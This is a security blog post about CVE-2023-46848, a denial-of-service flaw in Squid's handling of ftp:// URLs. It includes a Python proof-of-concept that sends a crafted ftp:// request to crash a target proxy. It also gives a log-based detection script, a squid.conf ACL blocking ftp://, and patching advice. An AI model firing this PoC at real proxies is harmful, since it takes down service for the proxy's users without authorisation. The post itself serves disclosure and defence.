*Published: June 2024*
Summary:
CVE-2023-46848 is a Denial of Service (DoS) vulnerability in Squid, the popular open-source proxy and cache server. This vulnerability allows attackers to crash or hang Squid by sending specially crafted ftp:// URLs via HTTP requests or through FTP-native input. We'll break down how the issue works, see sample code, and explore both the risks and how to respond.
What Is Squid and Why Does CVE-2023-46848 Matter?
Squid is widely used for proxying, content filtering, and caching web content. Organizations rely on its speed and flexibility. Unfortunately, this very flexibility can sometimes expose attack surfaces—like what happened with CVE-2023-46848.
Official References
- CVE-2023-46848 at MITRE
- Squid Security Advisory
Understanding CVE-2023-46848
The vulnerability arises when Squid handles ftp:// URLs. A remote attacker, with no need for authentication, can send specially crafted HTTP requests containing ftp:// URLs or manipulate FTP-native input to generate such URLs.
When Squid processes these, it may crash or hang due to how it parses and manages memory for these URLs, causing a Denial of Service. This means legitimate users lose connectivity until the server is restarted or recovers.
1. The Dangerous HTTP Request
A remote attacker sends a simple HTTP GET request via a browser or a basic tool like curl or telnet, such as:
```http
GET ftp://malicious.example.com/file.txt HTTP/1.1
Host: proxy-vulnerable.example.com
```
Alternatively, if the proxy also relays native FTP clients (an `ftp_port` listener), the attacker can issue FTP commands that make Squid construct the equivalent ftp:// URL internally, reaching the same code path without speaking HTTP at all.
2. Squid Tries to Handle This
Squid's FTP gateway accepts ftp:// URLs from HTTP clients and translates each one into an FTP session with the origin server. In the affected versions, the code that parses and prepares these URLs does not handle certain malformed inputs correctly, so a crafted URL can make the worker consume excessive CPU or memory or hit an unrecoverable error that terminates the process.
Below is a basic example using Python to send a targeted request to a vulnerable Squid proxy. The request body is the page's own proof-of-concept; the only changes are a placeholder target address and a socket timeout, because a hung or dead worker never answers and `recv()` would otherwise block forever.

```python
import socket

proxy_host = "192.0.2.10"   # Replace with the target IP (192.0.2.0/24 is documentation address space)
proxy_port = 3128           # Default Squid listening port

# Absolute-form request for an ftp:// URL; "%A" is a truncated percent-escape.
request = (
    "GET ftp://evil.attacker.com/%Acrashy HTTP/1.1\r\n"
    f"Host: {proxy_host}\r\n"
    "User-Agent: EvilPoC\r\n"
    "Connection: close\r\n\r\n"
)

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.settimeout(10)  # do not block forever if the worker hangs or dies
    s.connect((proxy_host, proxy_port))
    s.sendall(request.encode())
    print("[*] Attack sent, waiting for server response...")
    try:
        print(s.recv(4096).decode(errors="replace"))
    except (socket.timeout, ConnectionResetError):
        print("[!] No response: the proxy may have hung or crashed")
```
> NOTE: DO NOT USE THIS CODE AGAINST SYSTEMS YOU DO NOT OWN OR HAVE EXPLICIT PERMISSION TO TEST. This is for educational purposes only.
Key risks:
- No authentication required: anyone who can reach the proxy port can attempt this; on an open or misconfigured proxy that means anyone on the internet.
- Chaining: a reliable crash is a ready-made denial of service that can be combined with other attacks, for example knocking out the proxy (and any filtering it provides) while a separate intrusion is under way.
Detection:
- Logs: cache.log may record an assertion failure, a FATAL message or a backtrace immediately before the worker dies. A hard crash can leave no access.log entry for the triggering request at all, so do not rely on access.log alone.
- Behavior: watch for repeated restarts, sustained high CPU, and bursts of ftp:// URLs in access.log, especially from a single client.
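The detection points above, as an added example that is not part of the original post: a small Python script that parses Squid's native access.log format, counts ftp:// requests per client, flags clients that burst such requests inside a short window, lists ftp:// transactions that ended with status 000 (no HTTP status was ever sent), and scans cache.log for crash markers. The log lines are constructed for illustration, not captured from a real proxy, and the burst threshold and window are placeholders to tune for your traffic.

```python
import re
from collections import Counter, defaultdict

# Constructed sample lines in Squid's native access.log format
# (timestamp elapsed client action/status bytes method URL ident hierarchy/peer type).
ACCESS_LOG = """\
1699000001.123    245 192.0.2.55 TCP_MISS/200 1234 GET http://example.org/index.html - HIER_DIRECT/203.0.113.20 text/html
1699000002.456     12 198.51.100.7 TCP_MISS/200 2048 GET ftp://mirror.example.net/pub/README - HIER_DIRECT/203.0.113.9 text/plain
1699000002.789      3 198.51.100.7 TCP_MISS/000 0 GET ftp://evil.example/%Acrashy - HIER_NONE/- -
1699000003.001      2 198.51.100.7 TCP_MISS/000 0 GET ftp://evil.example/%Acrashy - HIER_NONE/- -
1699000003.002      2 198.51.100.7 TCP_MISS/000 0 GET ftp://evil.example/%Acrashy - HIER_NONE/- -
1699000004.300    150 192.0.2.56 TCP_HIT/200 512 GET http://example.org/logo.png - HIER_NONE/- image/png
"""

# Constructed cache.log excerpt with the kind of lines a worker writes as it dies.
CACHE_LOG = """\
2023/11/03 08:14:59 kid1| Accepting HTTP Socket connections at conn3 local=[::]:3128 remote=[::] FD 11 flags=9
2023/11/03 08:15:07 kid1| FATAL: Received Segment Violation...dying.
2023/11/03 08:15:08 kid1| Squid Cache (Version 6.3): Terminated abnormally.
"""

ACCESS_RE = re.compile(
    r"^(?P<ts>\d+\.\d+)\s+(?P<elapsed>\d+)\s+(?P<client>\S+)\s+"
    r"(?P<action>[A-Z_]+)/(?P<status>\d{3})\s+(?P<size>\d+)\s+"
    r"(?P<method>\S+)\s+(?P<url>\S+)"
)

# Substrings that mark a crashing or aborting worker in cache.log.
CRASH_MARKERS = ("FATAL:", "assertion failed", "Terminated abnormally")


def parse_access_log(text):
    """Parse native-format access.log lines into dicts; unparseable lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = ACCESS_RE.match(line)
        if not m:
            continue
        e = m.groupdict()
        e["ts"] = float(e["ts"])
        e["status"] = int(e["status"])
        entries.append(e)
    return entries


def is_ftp(entry):
    return entry["url"].lower().startswith("ftp://")


def ftp_requests_by_client(entries):
    """Count ftp:// requests per client IP."""
    return Counter(e["client"] for e in entries if is_ftp(e))


def aborted_ftp_requests(entries):
    """ftp:// transactions logged with status 000, i.e. no HTTP status was ever sent."""
    return [e for e in entries if is_ftp(e) and e["status"] == 0]


def flag_ftp_bursts(entries, threshold=3, window=60.0):
    """Clients that issued at least `threshold` ftp:// requests inside any `window`-second span.

    Returns {client: peak_count}. Threshold and window are placeholders; tune to your traffic.
    """
    stamps = defaultdict(list)
    for e in entries:
        if is_ftp(e):
            stamps[e["client"]].append(e["ts"])
    flagged = {}
    for client, ts in stamps.items():
        ts.sort()
        peak, j = 0, 0
        for i in range(len(ts)):          # sliding window over sorted timestamps
            while j < len(ts) and ts[j] - ts[i] <= window:
                j += 1
            peak = max(peak, j - i)
        if peak >= threshold:
            flagged[client] = peak
    return flagged


def crash_events(cache_log_text):
    """cache.log lines indicating the worker died (a crash leaves no access.log entry)."""
    return [ln for ln in cache_log_text.splitlines() if any(m in ln for m in CRASH_MARKERS)]


if __name__ == "__main__":
    entries = parse_access_log(ACCESS_LOG)
    print("ftp:// requests per client:", dict(ftp_requests_by_client(entries)))
    print("aborted ftp:// transactions:", len(aborted_ftp_requests(entries)))
    print("clients with ftp:// bursts:", flag_ftp_bursts(entries))
    for line in crash_events(CACHE_LOG):
        print("crash marker:", line)
```

Run it against your real logs by replacing the two constants with file contents; correlate a cache.log crash marker with the last few ftp:// requests in access.log just before it, since the request that actually killed the worker is often the one that never got logged.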
Update Squid:
The Squid project has released a fix; update to the most recent stable release. Check what you are running with `squid -v`, and bear in mind that distribution packages often backport the fix without changing the upstream version number, so confirm against your vendor's advisory as well.
Network Filtering:
If you cannot patch immediately, block ftp:// URLs at your firewall or upstream filtering device, or deny them in squid.conf with an ACL on the URL scheme. If you run an `ftp_port` listener for native FTP clients, consider disabling it until the proxy is patched, since that path reaches the same code.
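A squid.conf fragment implementing the ACL mitigation, as an added example that is not from the Squid advisory or the original post. The ACL names are arbitrary, and the `proto` and `url_regex` ACL types are standard Squid ACL types.

```conf
# Deny any request whose URL scheme is FTP. Put these lines ABOVE any
# "http_access allow ..." rule: http_access is evaluated top-down, first match wins.
acl ftp_scheme proto FTP
http_access deny ftp_scheme

# Belt and braces: also match the literal scheme text, case-insensitively.
acl ftp_url url_regex -i ^ftp://
http_access deny ftp_url
```

Validate the file with `squid -k parse`, apply it with `squid -k reconfigure`, and confirm the block by fetching an ftp:// URL through the proxy: the request should be refused with a 403 and appear in access.log as TCP_DENIED/403. This is a service reduction, not a fix; remove the rules once you are on a patched release if your users need FTP through the proxy.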
Conclusion
CVE-2023-46848 is a good reminder that even mature, trusted infrastructure like Squid can have surprising vulnerabilities. If you run Squid, patch now. If you can't, use access control to limit risk.
Further Reading
- Squid Bugzilla: Bug 5267 – Denial of Service
- How Squid handles FTP
Timeline
Published on: 11/03/2023 08:15:08 UTC
Last modified on: 12/14/2023 10:15:08 UTC